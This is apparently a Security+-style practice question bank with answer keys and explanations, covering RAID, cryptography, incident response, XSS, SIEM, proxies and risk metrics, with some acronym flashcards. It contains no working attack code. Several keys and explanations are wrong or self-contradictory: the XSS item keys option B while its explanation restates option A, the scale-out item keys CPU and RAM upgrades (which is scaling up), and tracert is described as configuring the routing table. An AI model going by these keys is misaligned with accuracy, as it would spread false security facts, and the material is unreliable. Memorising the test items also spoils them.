A Redundant Array of Independent Disks (RAID) is installed with data written to two disks with 50% storage efficiency. Which RAID level has been utilized? A. Level 0 B. Level 1 C. Level 5 D. Level 6
B Redundant Array of Independent Disks (RAID) Level 1 uses mirroring where data is written to two disks simultaneously, which provides redundancy. The main drawback is its storage efficiency is only 50%. RAID Level 0 is striping without parity resulting in no fault tolerance. Data is written in blocks across several disks. RAID Level 5 has striping with parity. Data is written across three or more disks, but additional information is calculated. This allows the volume to continue if one disk is lost. This solution has better storage efficiency than RAID 1. RAID Level 6 has double parity or Level 5 with an additional parity stripe. This allows the volume to continue when two disks have been lost.
A company has a critical encryption key that has an M-of-N control configuration for protection. Examine the examples and select the one that correctly illustrates the proper configuration for this type of protection of critical encryption keys. A. M=1 and N=5 B. M=3 and N=5 C. M=6 and N=5 D. M=0 and N=5
B A correct configuration for an M-of-N control is M=3 and N=5. M stands for the number of authorized administrators that must be present to access the critical encryption keys, and N is the total number of authorized administrators. In this scenario, 3 of the 5 administrators must be present for access. M is always greater than 1 for this type of configuration, making M=1 and N=5 not a valid choice. If only 1 administrator must be present, this configuration would be unnecessary. M=6 and N=5 is not possible, as this configuration is asking for more administrators to be present than are authorized. The final option of M=0 is not viable because M must always be greater than 1.
An attacker compromises a Linux host, installing a web shell as a backdoor. If the attacker gained access to the host through a connection the host established, what type of attack has occurred? A. Man-in-the-Browser (MitB) B. Reverse shell C. Rootkit D. Session hijacking
B A reverse shell is a common attack vector against a Linux host, where a victim host opens a connection to the attacking host through a maliciously spawned remote command shell. A man-in-the-browser (MitB) attack compromises the web browser. An attacker may be able to inspect session cookies, certificates, and data, change browser settings, perform redirection, and inject code. Malware running with system or root level privilege is referred to as a rootkit, which gives an attacker unrestricted access to everything from the root of the file system down. Session hijacking involves replaying a web application cookie in some way. Attackers can sniff network traffic to obtain session cookies sent over an unsecured network.
Examine each attack vector. Which is most vulnerable to escalation of privileges? A. Software B. Operating System (OS) C. Applications D. Ports
B A vulnerability in an OS kernel file or shared library can allow privilege escalation, where the malware code runs with higher access rights (system or root). Root or system accounts are considered superuser accounts with administrative privileges. Software exploitation means an attack that targets a vulnerability in software code. An application vulnerability is a design flaw that can cause the security system to be circumvented or that will cause the application to crash. Security best practice for network configurations dictates that open ports should be restricted to only necessary services. Running unnecessary open ports and services increases the attack surface.
A security technician needs to transfer a large file to another user in a data center. Which statement best illustrates what type of encryption the technician should use to perform the task? A. The technician should use symmetric encryption for authentication and data transfer. B. The technician should use asymmetric encryption to verify the data center user's identity and agree on a symmetric encryption algorithm for the data transfer. C. The technician should use asymmetric encryption for authentication and data transfer. D. The technician should use symmetric encryption to verify the data center user's identity and agree on an asymmetric encryption algorithm for the data transfer.
B Asymmetric encryption is used for authentication, non-repudiation, and key agreement and exchange. Symmetric encryption is more efficient for bulk encryption of large amounts of data for transfer. Symmetric encryption is very fast and used for bulk encryption of large amounts of data. Symmetric encryption cannot be used for authentication or integrity, because both parties know the same key. Asymmetric encryption can be used to prove identity. Asymmetric encryption involves substantial computing overhead compared to symmetric encryption, so it is inefficient for large data transfers. Key agreement/exchange refers to settling on a secret symmetric key to use for bulk encryption without anyone else discovering it.
A systems administrator suspects that a virus has infected a critical server. In which step of the incident response process does the administrator notify stakeholders of the issue? A. Recovery B. Identification C. Containment D. Eradication
B In the identification phase, it is important to determine whether an incident has taken place, assess how severe it might be (triage), and notify stakeholders. The recovery phase reintegrates the system into the environment and may involve the restoration of data from backup and security testing. The systems administrator must monitor the systems more closely for a period to detect and prevent any reoccurrence of the attack. The containment phase aims to limit the scope and magnitude of the incident. The goal is to secure data while limiting the immediate impact on customers and business partners. In the eradication phase, the admin removes the cause and restores the system to a secure state by applying secure configuration settings and installing patches.
A hacker set up a Command and Control network to control a compromised host. What is the ability of the hacker to use this remote connection method as needed known as? A. Weaponization B. Persistence C. Reconnaissance D. Pivoting
B Persistence refers to the hacker's ability to reconnect to the compromised host and use it as a Remote Access Tool (RAT) or backdoor. To do this, the hacker must establish a Command and Control (C2 or C&C) network. Weaponization is an exploit used to gain some sort of access to a target's network, but it doesn't involve being able to reconnect. Reconnaissance is the process of gathering information; it is not related to Command and Control networks. Pivoting follows persistence. It involves a system and/or set of privileges that allow the hacker to compromise other network systems (lateral spread). The hacker likely has to find some way of escalating the privileges available to him/her.
Which scenario best describes provisioning? A. A developer removes an application from packages or instances. B. A developer deploys an application to the target environment. C. A developer sets up ID system for each iteration of a software product. D. A developer commits and tests updates.
B Provisioning is the process of deploying an application to the target environment. An enterprise provisioning manager might assemble multiple applications in a package. Deprovisioning is the process of removing an application from packages or instances. This might be necessary if software has to be completely rewritten or no longer satisfies its purpose. Version control is an ID system for each iteration of a software product. Most version control numbers represent both the version and internal build numbers for use in the development process. Continuous integration is the principle that developers should commit and test updates often—every day or sometimes even more frequently. This reduces the chances of two developers spending time on code changes that are later found to conflict with one another.
Compare and contrast the types of Cross-Site Scripting (XSS) attacks, and select the option that accurately distinguishes between them. A. Reflected and DOM attacks exploit client-side scripts, while a stored attack exploits vulnerabilities in server-side scripts. B. Reflected and stored XSS attacks exploit server-side scripts, while the DOM is used to exploit vulnerabilities in client-side scripts. C. Reflected and DOM attacks exploit server-side scripts, while a stored attack exploits vulnerabilities in client-side scripts. D. Nonpersistent and persistent attacks exploit client-side scripts, while the DOM is used to exploit vulnerabilities in server-side scripts.
B Reflected and DOM attacks exploit client-side scripts, while a stored attack exploits vulnerabilities in server-side scripts. Document Object Model (DOM) is when attackers send malicious scripts to a web app's client-side implementation of JavaScript to execute their attack solely on the client. Both reflected and stored Cross-Site Scripting (XSS) attacks exploit server-side scripts, not client-side. Document Object Model (DOM) modifies the content and layout utilizing client-side scripts. While reflected Cross-Site Scripting (XSS) attacks exploit server-side scripts, Document Object Model (DOM) exploits client-side scripts. A stored attack exploits server-side scripts. A nonpersistent attack is another name for reflected, and a persistent attack is another name for a stored attack. Both of these attacks exploit server-side scripts. DOM exploits client-side scripts.
Management of a company identifies priorities during a risk management exercise. By doing so, which risk management approach does management use? A. Inherent risk B. Risk posture C. Risk transference D. Risk avoidance
B Risk posture is the overall status of risk management. Risk posture shows which risk response options management can identify and prioritize. The result of a quantitative or qualitative analysis is a measure of inherent risk. Inherent risk is the level of risk before attempting any type of mitigation. Transference means assigning risk to a third party, such as an insurance company or a contract with a supplier that defines liabilities. Risk avoidance means that management halts the activity that is risk-bearing. For example, management may discontinue a flawed product to avoid risk.
Which type of attack disguises the nature of malicious input, preventing normalization from stripping illegal characters? A. Fuzzing B. Canonicalization C. Code reuse D. Code signing
B The threat actor might use a canonicalization attack to disguise the nature of the malicious input. Canonicalization refers to the way the server converts between the different methods by which a resource (such as a file path or URL) may be represented and submitted to the simplest (or canonical) method used by the server to process the input. Fuzzing is a means of testing that an application's input validation routines work well. The test, or vulnerability scanner, generates large amounts of deliberately invalid and random input and records the application's responses. Code reuse occurs through the use of a block of code from elsewhere in the same application, or from another application, to perform a different function. Code signing is the principal means of proving the authenticity and integrity of code.
Evaluate the functions of a Network-Based Intrusion Detection System (NIDS) and conclude which statements are accurate. (Select all that apply.) A. Training and tuning are fairly simple, and there is a low chance of false positives and false negatives. B. A NIDS will identify and log hosts and application activity that the administrator can use to analyze and take further action. C. Training and tuning are complex, and there is a high chance of false positive and negative rates. D. A NIDS will identify attacks and block the traffic to stop the attack. The administrator will be able to review the reports for future prevention.
B and C A NIDS can identify and log hosts and applications and detect attack signatures and other indicators of attack. An administrator can analyze logs to tune firewall rulesets, remove or block suspect hosts and processes, or deploy additional security controls to mitigate threats identified. One of the main disadvantages of NIDS is that training and tuning are complex, which results in high false positive and false negative rates, especially during initial deployment. NIDS training and tuning are complex, with high initial false positive and false negative rates. A NIDS will not block the traffic during an attack, which is a disadvantage. If an administrator does not immediately review logs during an attack, a delay will occur and the attack will continue.
Which statement regarding attacks on media access control (MAC) addresses accurately pairs the method of protection and what type of attack it guards against? (Select all that apply.) A. MAC filtering guards against MAC snooping. B. Dynamic Host Configuration Protocol (DHCP) snooping guards against MAC spoofing. C. MAC filtering guards against MAC spoofing. D. DAI guards against invalid MAC addresses.
B and C In MAC filtering, a switch will record the specified number of MACs allowed to connect to a port, but then drop any traffic from other MAC addresses. DHCP snooping inspects traffic arriving on access ports to ensure that a host is not trying to spoof its MAC address. MAC filtering on a switch defines which MAC addresses are allowed to connect to a particular port, dropping other traffic to protect against MAC flooding attacks. DAI allows a network administrator to intercept, log, and discard ARP packets with invalid MAC-address-to-IP-address bindings.
A senior administrator is teaching a new technician how to properly develop a standard naming convention in Active Directory (AD). Examine the following responses and determine which statements are sound advice for completing this task. (Select all that apply.) A. Create as many root-level containers and nest containers as deeply as needed B. Consider grouping Organizational Units (OU) by location or department C. Build groups based on department, and keep all accounts, both standard and administrative, in the same group D. Within each root-level Organizational Unit (OU), use separate child OUs for different types of objects
B and D Organizational Units (OUs) represent administrative boundaries. They allow the enterprise administrator to delegate administrative responsibility for users and resources in different locations or departments. An OU grouped by location will be sufficient if different IT departments are responsible for services in different geographic locations. An OU grouped by department is more applicable if different IT departments are responsible for supporting different business functions. Within each root-level parent OU, use separate child OUs for different types of objects such as servers, client systems, users and groups. Be consistent. Do not create too many root-level containers or nest containers too deeply. They should not be more than five levels. Separate administrative user and group accounts from standard ones.
A startup designs a new online service and uses a serverless approach for some business functions. With this approach, how does the startup accomplish these functions? (Select all that apply.) A. Virtual machines B. Containers C. Single service D. Orchestration
B and D When an operation needs processing, by using a container, the cloud spins up the container to run the code, performs the processing, and then destroys the container. A virtual machine is a full-fledged operating system that runs in a virtual environment and is considered a server, not serverless. Serverless refers to creating and using containers when needed. A single service would provide a specific output. Many services require working together in a serverless environment. Serverless architecture depends heavily on the concept of event-driven orchestration with many services involved to facilitate operations.
A network manager assists with developing a policy to protect the company from data exfiltration. The employee devises a list of focus points to include. Which plans, when consolidated, provide the best protection for the company? (Select all that apply.) A. Store backups of critical data, that may be targeted for destruction or ransom, on-site within a secure space. B. Creating a training program for all employees that reiterates the importance of knowing how to use encryption to secure data. C. Only allow removable media if it is company property, if it is required to perform a task, and if it has been cleared through the proper channels D. Encrypt all sensitive data at rest and disconnect systems that are storing archived data from the network
B, C, and D Employees need training in document confidentiality and how to use encryption to store and transmit data securely. Annual refresher training will remind employees of its importance. One mechanism for data exfiltration is by copying data to removable media or other device storage, such as USB drives or memory cards. Limiting the use of these to company property and only for job-related tasks helps reduce this risk. Always encrypt sensitive data at rest. Transferring data outside of the network will likely be useless without the decryption key. Offsite backups are the most secure for data that may be targeted for destruction or ransom. The data will remain on site, but the backups are offsite and provide redundancy for the company in the event of destruction or ransom demands.
You are asked to help design a security system. What are some methods that can be used to mitigate risks to embedded systems in security environments? (Select all that apply.) A. Faraday cage B. Firmware patching C. Network Segmentation D. Wrappers
B, C, and D Firmware patching for embedded systems is just as vital as keeping host OS software up to date on a traditional computer. Network segmentation is one of the core principles of network security. This control network should be separated from the corporate network using firewalls and VLANs. One way of increasing the security of data in transit for embedded systems is through the use of wrappers, such as IPSec. The only thing visible to an attacker or anyone sniffing the wire is the IPSec header, which describes only the tunnel endpoints. A Faraday cage would help prevent outside interference or leakage of wireless radio frequencies, but may inhibit the use of a security system, such as a keyless door.
Compare and evaluate the various levels and types of platform security to conclude which option applies to a hardware Trusted Platform Module (TPM). A. A specification for a suite of high-level communication protocols used for network communication. B. The boot metrics and operating system files are checked and signatures verified at logon. C. Digital certificates, keys, and hashed passwords are maintained in hardware-based storage. D. The industry standard program code that is designed to operate the essential components of a system.
C A Trusted Platform Module (TPM) is a specification for hardware-based storage of digital certificates, keys, hashed passwords, and other user and platform identification information. TPM is not a specification for a suite of high-level communication protocols used for network communication. A secure boot is a security system designed to prevent a computer from being hijacked by a malicious OS. The Basic Input/Output System (BIOS) provides an industry standard program code that operates the essential components of the PC and ensures that the design of each manufacturer's motherboard is PC compatible.
IT staff looks to provide a high level of fault tolerance while implementing a new server. With which systems configuration approach does the staff achieve this goal? A. Adapting to demand in real time B. Adding more resources for power C. Duplicating critical components D. Increasing the power of resources
C A system often achieves fault tolerance by provisioning redundancy for critical components and single points of failure. Although not required for normal operation, a redundant component is available for system recovery. Elasticity refers to the system's ability to handle any changes in resource demand in real time. Elasticity often applies to processing power and storage. A system achieves scalability by adding resources. To scale out is to add more resources in parallel with existing resources. To scale up is to increase the power of existing resources.
Which cookie attribute can a security admin configure to help mitigate a request forgery attack? A. Secure B. HttpOnly C. SameSite D. Cache-Control
C Cookies can be a vector for session hijacking and data exposure if not configured correctly. Use the SameSite attribute to control where a cookie may be sent, mitigating request forgery attacks. Set the Secure attribute to prevent a cookie from being sent over unencrypted HTTP. Set the HttpOnly attribute to make the cookie inaccessible to document object model/client-side scripting. A number of security options can be set in the response header returned by the server to the client, including Cache-Control, which sets whether the browser can cache responses. Preventing caching of data protects confidential and personal information where multiple users might share the client device.
An organization routinely communicates directly to a partner company via a domain name. The domain name now leads to a fraudulent site for all users. Systems administrators for the organization find incorrect host records in DNS. What do the administrators believe to be the root cause? A. A server host has a poisoned arp cache. B. Some user systems have invalid hosts file entries. C. An attacker masquerades as an authoritative name server. D. The domain servers have been hijacked.
C DNS server cache poisoning aims to corrupt the records held by the DNS server itself. A DNS server queries an authoritative server for domain information. An attacker can masquerade as an authoritative name server and respond with fraudulent information. An ARP cache contains entries that map IP addresses to MAC addresses. An ARP cache is not related to name resolution. Before developers created DNS, early name resolution took place using a text file named HOSTS. In this case, all users are experiencing an issue, not just some. Domain reputation can be impacted if an attacker hijacks public servers. In this case, the systems administrators found invalid host records, which ruled out hijacking.
An Identity and Access Management (IAM) system has four main processes. Which of the following is NOT one of the main processes? A. Accounting B. Identification C. Integrity D. Authentication
C Integrity is the fundamental security goal of keeping organizational information accurate, free of errors, and without unauthorized modifications. However, it is not part of the IAM system. IAM defines the attributes that comprise an entity's identity. The four processes include Authorization, Accounting, Identification, and Authentication. Accounting is tracking authorized usage of a resource or use of rights by a subject and alerting when unauthorized use is detected or attempted. Identification is creating an account or ID identifying the user, device, or process on the network. Authentication is proving that a subject is who or what it claims to be when attempting to access the resource.
Management of a company practices qualitative risk when assessing a move of systems to the cloud. How does the company indicate any identified risk factors? A. With an exposure factor (EF) B. With an annualized loss expectancy (ALE) C. With a classification system D. With transference
C Qualitative risk assessment uses categories or classifications such as Irreplaceable, High Value, Medium Value, and Low Value. An Exposure Factor (EF) is the percentage of the asset value that would be lost in the event of an incident. Annualized Loss Expectancy (ALE) is the amount that would be lost over the course of a year. To calculate the ALE, multiply the SLE by the Annualized Rate of Occurrence (ARO). Transference means assigning risk to a third party, such as an insurance company or a contract with a supplier that defines liabilities.
A security team is in the process of selecting a cryptographic suite for their company. Analyze cryptographic implementations and determine which of the following performance factors is most critical to this selection process if users primarily access systems on mobile devices. A. Speed B. Latency C. Computational overhead D. Cost
C Some technologies or ciphers configured with longer keys require more processing cycles and memory space, which makes them slower and causes them to consume more power. This makes them unsuitable for handheld devices and embedded systems that work on battery power. Speed is most impactful when processing large amounts of data. For some use cases, the time required to obtain a result is more important than a data rate. Latency issues may negatively affect performance when an operation or application times out before the authentication handshake completes. Cost issues may arise in any decision-making process, but for mobile device cryptography, computational overhead is the primary limiting factor.
Analyze each statement and determine which describes a fundamental improvement on traditional log management that security information and event management (SIEM) offers. A. SIEM is completely automated; it requires no manual data preparation. B. SIEM logs ensure non-repudiation, whereas other logs cannot link a specific user to an action. C. SIEM can perform correlation, linking observables into meaningful indicators of risk or compromise. D. SIEM addresses the issue of sheer volume of alerts, using machine learning to facilitate threat hunting.
C While SIEM can automate many functions of log collection and review, security managers may also have to manually prepare data using a Linux command line. Logs typically associate an action with a particular user, satisfying non-repudiation. SIEM correlates individual events or data points (observables) into a meaningful indicator of risk, or Indicator of Compromise (IOC). Correlation is the principal factor distinguishing it from basic log management. Security orchestration, automation, and response (SOAR) is a solution to the problem of the volume of alerts overwhelming analysts' ability to respond. A security engineer may implement SOAR as a standalone technology or integrate it with a SIEM, using machine/deep learning techniques to enrich data for use in incident response and threat hunting.
An organization configures both a warm site and a hot site for disaster preparedness. Doing so poses which challenges for the organization? (Select all that apply.) A. Resiliency B. Diversity C. Complexity D. Budgetary
C and D Creating a duplicate of anything doubles the complexity of securing that resource properly. Having multiple sites increases the complexity of the infrastructure. Providing redundancy on a scale that includes multiple locations can be very expensive. Businesses often lease sites from service providers to reduce costs. Enterprise-level networks often provision resiliency at the site level. An alternate processing or recovery site is a location that can provide the same (or similar) level of service. Technology diversity refers to environments that are a mix of operating systems, applications, coding languages, virtualization solutions, etc. The diversity level should not change according to the number of sites as they are simply mirrored.
CYOD
Choose Your Own Device
XSS
Cross-site scripting
A system administrator suspects a memory leak is occurring on a client. Determine which scenario would justify this finding. A. A rapid decrease in disk space has been logged. B. High page file utilization has been logged. C. High memory utilization during scheduled backups after-hours. D. Software does not release allocated memory when it is done with it.
D A memory leak is a process that takes up memory without subsequently freeing it up, which a worm or other type of malware can cause. Looking for decreasing available bytes and increasing committed bytes can detect this type of memory leak. A rapid decrease in disk space is related to storage usage rather than memory usage. This may occur during data migration or archival. High page file utilization occurs when there is insufficient physical memory to support multiple running applications. This could indicate the existence of malware. High utilization out-of-hours can be suspicious if no scheduled activities are occurring, such as backup or virus scanning.
A systems administrator deploys a cloud access security broker (CASB) solution for user access to cloud services. Evaluate the options and determine which solution may be configured at the network edge and without modifying a user's system. A. Single sign-on B. Application programming interface C. Forward proxy D. Reverse proxy
D A reverse proxy (positioned at the cloud network edge) directs traffic to cloud services if the contents of that traffic comply with policy. This does not require configuration of users' devices. Single sign-on authentication and enforcing access controls and authorizations from the enterprise network to the cloud provider is a feature of a CASB. Rather than placing a CASB appliance or host inline with cloud consumers and the cloud services, an API-based CASB brokers connections between the cloud service and the cloud consumer. A forward proxy is a security appliance or host, positioned at the client network edge, that forwards user traffic to the cloud network if the contents of that traffic comply with policy. This requires configuration of users' devices.
An administrator uses data from a Security Information and Event Management (SIEM) system to identify potential malicious activity. Which feature does the administrator utilize when implementing rules to interpret relationships between datapoints to diagnose incidents? A. Retention B. Trend Analysis C. Baseline D. Correlation
D Correlation means interpreting the relationship between individual data points to diagnose incidents of significance to the security team. A SIEM correlation rule is a statement that matches certain conditions. A SIEM can enact a retention policy to keep historical log and network traffic data for a defined period. This allows for retrospective incident investigation and threat hunting. Trend analysis is the process of detecting patterns or indicators within a data set over a time series and using those patterns to make predictions about future events. A baseline is a point of reference that provides a record of settings and configurations for comparison purposes.
A network administrator wants to use a proxy server to prevent external hosts from connecting directly with application servers. Which proxy server implementation will best fit this need? A. Transparent proxy server B. Non-transparent proxy server C. Caching proxy server D. Reverse proxy server
D Deployed on the network edge, reverse proxy servers protect servers from direct contact with client requests from a public network (the Internet). A transparent (or forced or intercepting) proxy intercepts client traffic without the client having to be reconfigured with the proxy server address. The network admin may implement a transparent proxy on a switch, router, or other inline network appliance. The network admin must configure the client with a non-transparent proxy server's address and port number (often port 8080) to use it. A caching server that does not require a client-side configuration is called a transparent proxy server. In this type of server, the client is unaware of a proxy server, which redirects client requests without modification.
Which situation would require keyboard encryption software be installed on a computer? A. To set up single sign-on privileges B. To comply with input validation practices C. For the purpose of key management D. To protect against spyware
D Keyboard encryption software is used to protect against keyloggers, which record keystrokes for the purpose of stealing data. Keyloggers are spyware. Single sign-on is a technology that enables a user to authenticate once and receive authorizations for multiple services. It does not require keyboard encryption. Input validation involves limiting the type of data a user can enter into specific fields, such as not allowing special characters in a user name field. Encryption is not a concern. Key management is the process of administering cryptographic keys and is performed by a Certificate Authority. It is not applicable to keyboard encryption.
A company has thirty servers that run for 125 hours, with three servers that fail. Rounding to the nearest whole number, calculate the Mean Time Between Failures (MTBF) for this scenario. A. 125 B. 41 C. 3,750 D. 1,250
D The calculation for Mean Time Between Failures (MTBF) is the total time divided by the number of total failures. In this scenario, the company has 30 servers that run for 125 hours (30x125), with the resulting product of 3,750. This result is then divided by the number of failures (3,750/3), which equals an MTBF of 1,250. The calculation for Mean Time to Failure (MTTF) is the same test but divided by the number of devices. (30x125)/30, with a result of 125. This answer choice (B) is derived by dividing the number of running hours by the number of systems. These two figures should be multiplied then divided by the failures for MTBF. This answer choice (C) is the result prior to dividing by the number of failures. Dividing 3,750 by 3 will give the correct MTBF.
A company is instituting role-based training. Which type of training will the company require the data owner to most likely complete? A. Expert knowledge of IT security and network design B. Training to ensure technical understanding of access controls C. Training on data management and PII plus regulatory and compliance frameworks D. Training on compliance issues and data classification systems
D The data owner is responsible for data guardianship, and training for this role will focus on compliance issues and data classification systems. The system owner is responsible for designing and planning computers, networks, and database systems. The role requires expert knowledge of Information Technology (IT) security and network design. The system administrator is responsible for the day-to-day system admin role and requires a technical understanding of access controls and privilege management systems. Privileged users are employees with access to privileged data and require extra training on data management and Personally Identifiable Information (PII) plus any relevant regulatory or compliance frameworks.
Security information and event management (SIEM) collects data inputs from multiple sources. Which of the following is NOT one of the main types of log collection for SIEM? A. Agent-based B. Listener/collector C. Sensor (sniffer) D. Artificial intelligence (AI)
D With an agent-based approach, data managers must install an agent service on each host. As events occur on the host, logging data is filtered, aggregated, and normalized at the host, then sent to the SIEM server for analysis and storage. A listener/collector appliance gathers or receives log and/or state data from other network systems, using a protocol, such as syslog or simple network management protocol (SNMP). As well as log data, the SIEM might collect packet captures and traffic flow data from sniffers/sensors. AI and machine learning can drive correlation efforts for automated analysis.
Evaluate the metrics associated with Mission Essential Functions (MEF) to determine which example is demonstrating Work Recovery Time (WRT). A. A business function takes five hours to restore, resulting in an irrecoverable business failure. B. It takes two hours to identify an outage and restore the system from backup. C. It takes three hours to restore a system from backup, and the restore point is two hours prior to the outage. D. It takes three hours to restore a system from backup, reintegrate the system, and test functionality.
D Work Recovery Time (WRT) is the additional time that it takes to restore data from backup, reintegrate different systems, and test overall functionality. This can also include briefing system users on any changes or different working practices so that the business function is again fully supported. The Maximum Tolerable Downtime (MTD) is the longest period of time that a business function outage may occur without causing irrecoverable business failure. Recovery Time Objective (RTO) is the period following a disaster that an individual IT system may remain offline. This represents the amount of time it takes to identify a problem that exists and perform recovery steps. Recovery Point Objective (RPO) is the amount of data loss that a system can sustain, measured in time. If a database is destroyed and has an RPO of 24 hours, the data can be recovered to a point not more than 24 hours before the database was infected.
DHS
Department of Homeland Security
DOM
Document Object Model
MSSP
Managed Security Service Provider
MTTR
Mean Time To Repair
OSINT
Open Source Intelligence
OU
Organizational unit
Port 465
SMTP over SSL
A system administrator must scan the company's web-based application to identify which ports are open and which operating system can be seen from the outside world. Determine the syntax that should be used to yield the desired information if the administrator will be executing this task from a Linux command line. A. netstat -a B. nmap -O C. nmap -sS 10.1.0.0/24 D. netstat -n
B The correct syntax is nmap -O. When the -O switch is used with nmap, it displays open ports and the installed operating system, but does not show the version. The netstat command checks the state of ports on the local machine. In Linux, the -a switch displays ports in the listening state; it does not enable software and version detection. Using nmap -sS 10.1.0.0/24 is a fast technique also referred to as half-open scanning, as the scanning host requests a connection without acknowledging it. Netstat shows the state of TCP/UDP ports on the local machine. Netstat -n suppresses name resolution, so host IP addresses and numeric ports are shown in the output.
TGT
Ticket Granting Ticket
2FA
Two-factor authentication
WEP
Wired Equivalent Privacy
ROSI calculation
[(ALE - ALEm) - Cost of Solution] / Cost of Solution, where ALE is before controls and ALEm is after controls.
While preparing a disaster recovery plan, management at a company considers how far back it can allow for the loss of data. Which metric does management use to describe this business essential data in terms of recovery? A. Recovery point objective B. Work recovery time C. Maximum tolerable downtime D. Mean time to repair
A Recovery Point Objective (RPO) is the amount of data loss that a system can sustain, measured in time. If data is not recoverable (such as the last five working days of data), there is significant impact to operations of the business. Work Recovery Time (WRT) follows systems recovery. During this time there may be additional work to reintegrate different systems and test overall functionality. Maximum tolerable downtime (MTD) is the longest period of time that a business function outage may occur without causing irrecoverable business failure. Mean time to repair (MTTR) is a measure of the time taken to correct a fault so that the system is restored to full operation.
An organization considers installing fingerprint scanners at a busy entry control point to a secure area. What concerns might arise with the use of this technology? (Select all that apply.) A. Fingerprint scanning is relatively easy to spoof. B. Installing equipment is cost-prohibitive. C. Surfaces must be clean and dry. D. The scan is highly intrusive.
A and C The main problem with fingerprint scanners is that it is possible to obtain a copy of a user's fingerprint and create a mold of it that will fool the scanner. The technology required for scanning and recording fingerprints is relatively inexpensive, and the process is quite straightforward. A fingerprint sensor is usually a small capacitive cell that can detect the unique pattern of ridges making up the fingerprint. Moisture or dirt can prevent good readings, so facilities using fingerprint scanners must keep readers clean and dry, which can prove challenging in high-throughput areas. Fingerprint technology is non-intrusive and relatively simple to use.
A systems administrator realizes the need to scale a server for high availability purposes. Which approaches does the administrator utilize to scale out the virtual system? (Select all that apply.) A. Add an additional CPU B. Give important processes higher priority C. Free up CPU usage by eliminating services D. Add additional RAM
A and D
A company hires a security consultant to train the IT team in incident response procedures. The consultant facilitates a question and answer session, and the IT team practices running scans. Determine which type of incident response exercise the consultant facilitates in this scenario. A. Tabletop exercise B. Walkthrough C. Simulation D. Forensics
B In a walkthrough, a facilitator presents a scenario and the incident responders demonstrate what actions they would take. Responders may run scans and analyze sample files, typically on sandboxed versions of the company's actual response and recovery tools. The facilitator in a tabletop exercise presents a scenario and the responders explain what action they would take to manage the threat—without the use of computer systems. Simulations are team-based exercises, where the red team attempts an intrusion, the blue team operates response and recovery controls, and a white team moderates and evaluates the exercise. Digital forensics describes techniques to collect and preserve evidence. Forensics procedures are detailed and time-consuming, whereas the purpose of incident response is usually urgent.
A new IT administrator accidentally causes a fire in the IT closet at a small company. Consider the disaster types and conclude which types this event might be classified as. (Select all that apply.) A. External B. Man-made C. Internal D. Environmental
B and C A man-made disaster event is one where human agency is the primary cause. Typical examples include terrorism, war, vandalism, pollution, and arson. There can also be accidental man-made disasters. An internal disaster is one that is caused by malicious activity or by accident by an employee or contractor. In this case, the fire was accidental. External disaster includes disasters that have an impact on the organization through wider environmental or social impacts, such as disruption of public services or impacts to a supply chain. An environmental disaster, or natural disaster, is one that could not be prevented through human agency. Environmental disasters include river or sea floods, earthquakes, and storms.
A server administrator configures digital signatures for secure communications. By doing so, the administrator accomplishes which secure method of communication? (Select all that apply.) A. Configuring encryption so no two hashes are the same B. Combining public key cryptography with hashing algorithms C. Using the same secret key to perform both encryption and decryption D. Providing authentication, integrity, and non-repudiation
B and D Public key cryptography can authenticate a sender because the sender controls the private key that encrypts messages. Adding hashing to an encrypted message proves integrity by computing a unique checksum. In a symmetric encryption cipher, the same secret key is used to perform both encryption and decryption operations. This does not define a digital signature. If two hashes are the same, then the data has not been tampered with during transmission. This is not something the administrator configures, but rather the result of secure communication. Public key cryptographic functions can be combined with hashing to authenticate a sender and prove the integrity of a message. This usage is called a digital signature.
A banking firm's IT team discovers a possible man-in-the-middle attack. Which of the following statements describes an assessment tool, built into the operating system, that would result in this discovery? (Select all that apply.) A. This tool is an open-source graphical packet capture and analysis utility, with installer packages for most operating systems. B. This tool sends probes to report the round trip time (RTT) for hops between the local host and a host on a remote network. C. This tool will repair the boot sector. D. This tool displays the local machine's Address Resolution Protocol (ARP) cache.
B and D tracert (Windows) and traceroute (Linux) allow the user to view and configure the host's local routing table using probes to report the round trip time (RTT) for hops between the local host and a host on a remote network. The ARP cache shows the MAC address of the interface associated with each IP address the local host has communicated with recently. A discrepancy in the MAC address may indicate a man-in-the-middle attack. The best way to resolve errors such as "Boot device not found," "OS not found," or "Invalid drive specification" is to use the boot disk option in your anti-virus software. This will include a scanner that may detect the malware that caused the problem in the first place and contain tools to repair the boot sector. Wireshark is an open-source graphical packet capture and analysis utility, with installer packages for most operating systems. However, it is not built into the operating system.
Management at a financial firm is assembling an incident response team that will be responsible for handling certain aspects of recovery and remediation following a security incident. What internal offices should provide a representative to serve as a member of this team? (Select all that apply.) A. Sales B. Legal C. HR D. PR
B, C, and D It is important to have access to legal expertise so that the team can evaluate incident response from the perspective of compliance with laws and industry regulations. An HR member should be on the team. Incident prevention and remediation actions may affect employee contracts, employment law, and more. A team is likely to require public relations input, so that any negative publicity from a serious incident can be managed. The PR role should be the one dealing with any media outlets. A sales representative would not be required. Typically, a team will consist of those that deal with any sort of rules, regulations, laws, and communications.
An unauthorized person gains access to a restricted area by blending in with a crowd of employees as they approach the security desk and show their badges to the guard. While walking down a long hallway, the group is stopped at a turnstile and the unauthorized person is discovered. What type of policy prevented this type of social engineering attack? A. CCTV policy B. Mantrap policy C. ID badge policy D. Skimming policy
B. A mantrap is a physical security control used for critical assets, where one gateway leads to an enclosed space protected by another barrier. CCTV (closed circuit television) is a cheaper means of providing surveillance than maintaining separate guards at each gateway or zone, though still not cheap to set up if the infrastructure is not already in place on the premises. Anyone moving through secure areas of a building should be wearing an ID badge. Security should stop anyone without an ID badge. Skimming involves the use of a counterfeit card reader to capture card details, which are then used to program a duplicate.
What type of phishing attack targets upper-level management? A. Pharming B. Credential harvesting C. Whaling D. Typosquatting
C. Whaling is a directed spear phishing attack that targets upper levels of management in a target organization. Pharming is a passive means of redirecting users from a legitimate website to a malicious one by corrupting the way the victim's computer performs Internet name resolution. Within the realm of phishing and pharming, credential harvesting is a campaign specifically designed to steal account credentials. Such attacks may use alarming messages as bait. A typosquatting threat actor registers a domain name that is very similar to a real one, hoping that users will not notice the difference. These are also referred to as cousin, lookalike, or doppelganger domains. Typosquatting might be used for pharming and phishing attacks.
What exploitation method targets near field communication (NFC) devices? A. Juice jacking B. Bluesnarfing C. Remote wipe D. Skimming
